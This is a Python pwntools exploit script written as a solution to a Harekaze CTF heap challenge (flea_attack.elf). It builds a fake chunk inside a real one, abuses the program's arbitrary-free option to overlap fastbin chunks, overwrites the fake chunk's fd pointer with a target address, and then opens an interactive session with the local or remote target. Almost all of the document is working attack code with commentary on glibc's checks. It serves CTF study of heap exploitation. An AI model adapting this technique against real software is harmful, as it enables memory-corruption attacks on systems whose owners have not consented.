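#!/usr/bin/python
"""Exploit for flea_attack.elf (Harekaze CTF): an overlapping-chunk attack
built on the binary's "free an arbitrary address" menu option.

Protocol as exercised by this script (the binary itself is not shown):
the menu prompt is ">", option "1" allocates (it reads a size, then the
data, and reports the allocation as "Addr: <hex>"), option "2" frees the
address given on the following line.

Steps:
  1. malloc(50) -> a 0x40 chunk; write a fake chunk header into its user
     data so that a fake 0x20 chunk sits at user pointer base+0x20.
  2. free(base+0x20) -> the fake chunk lands in the 0x20 fastbin.
  3. free(base)      -> the real chunk lands in the 0x40 fastbin.
  4. malloc(50)      -> the real chunk comes back; writing 40 bytes re-creates
     the fake header and overwrites the fake chunk's fd (which lives at
     base+0x20) with FASTBIN_TARGET, so a later 0x20-class allocation is
     served from FASTBIN_TARGET+0x10.

NOTE(review): this relies on classic fastbin behaviour (pre-tcache glibc);
on glibc >= 2.26 small frees go to tcache first and the checks differ.

Run with no arguments for the local binary, or with "remote" as the first
argument for the competition server.
"""
import sys

from pwn import p64, process, remote

BINARY = "./flea_attack.elf"
REMOTE_HOST = "problem.harekaze.com"
REMOTE_PORT = 20175

# Request size for both allocations; malloc(50) rounds up to a 0x40 chunk
# on 64-bit glibc.
ALLOC_SIZE = 50
# User-pointer offset of the fake chunk inside the real chunk.  With a 0x20
# fake chunk this makes the fake chunk end exactly where the real 0x40 chunk
# ends, so the "next chunk" that free() sanity-checks (the
# "free(): invalid next size (fast)" test) is the genuine neighbour.
FAKE_CHUNK_OFFSET = 0x20
# Size field of the fake chunk: 0x20 | PREV_INUSE.
FAKE_CHUNK_SIZE = 0x21
# Value written into the fake chunk's fd.  malloc() only hands out
# FASTBIN_TARGET+0x10 if the 8 bytes at FASTBIN_TARGET+8 parse as a chunk
# size of the same fastbin class as the fake chunk (otherwise glibc aborts
# with "malloc(): memory corruption (fast)").  The original note reads
# "Must be a valid chunk header".  Presumably a spot in the non-PIE
# binary's data area -- verify against the target build before reuse.
FASTBIN_TARGET = 0x203ff8


def pause(msg):
    """Block until the operator presses Enter (used to attach a debugger)."""
    try:
        raw_input(msg)
    except NameError:  # Python 3
        input(msg)


def start(argv):
    """Return a pwntools tube: the local binary by default, the remote
    service when the first argument is "remote"."""
    if len(argv) > 1 and argv[1] == "remote":
        return remote(REMOTE_HOST, REMOTE_PORT)
    return process(BINARY)


def alloc(p, size, data):
    """Menu option 1: allocate `size` bytes and fill them with `data`."""
    p.recvuntil(b">")
    p.sendline(b"1")
    p.sendline(str(size).encode())
    p.sendline(data)


def free(p, addr):
    """Menu option 2: free `addr`.  The address is sent as bare hex without a
    0x prefix, exactly as the original script did."""
    p.recvuntil(b">")
    p.sendline(b"2")
    p.sendline(("%x" % addr).encode())


def fake_chunk_payload(fd=None):
    """Return the 32 bytes that, written at the real chunk's user pointer,
    place a fake chunk header at base+0x10 (prev_size=0) / base+0x18
    (size=0x21).  With `fd` given, 8 more bytes follow, landing on the fake
    chunk's fd field at base+0x20."""
    payload = b"blahblah" + p64(0) + p64(0) + p64(FAKE_CHUNK_SIZE)
    if fd is not None:
        payload += p64(fd)
    return payload


def main(argv):
    """Drive the four-step overlap and drop into an interactive shell."""
    p = start(argv)
    pause("<ATTACH NOW>")
    # The binary asks something first; the answer does not matter.
    p.recv()
    p.sendline(b"")

    # Step 1: real chunk with an embedded fake 0x20 chunk header.
    alloc(p, ALLOC_SIZE, fake_chunk_payload())
    p.recvuntil(b"Addr: ")
    basechunk = int(p.recvline().strip(), 16)
    print(" ADDRESS OF CHUNK AT: %x" % basechunk)
    pause("<STOP>")

    # Step 2: free the fake chunk (0x20 fastbin) via the arbitrary-free option.
    fake_chunk = basechunk + FAKE_CHUNK_OFFSET
    print(" FREEING CHUNK at %x" % fake_chunk)
    free(p, fake_chunk)
    # Step 3: free the real chunk (0x40 fastbin); it overlaps the fake one.
    free(p, basechunk)

    # Step 4: the real chunk is returned by the next malloc(50); the write
    # restores the fake header and plants FASTBIN_TARGET as the fake chunk's fd.
    print("ALLOCATING FIRST CHUNK WITH OVERWRITE")
    alloc(p, ALLOC_SIZE, fake_chunk_payload(fd=FASTBIN_TARGET))
    p.interactive()


if __name__ == "__main__":
    main(sys.argv)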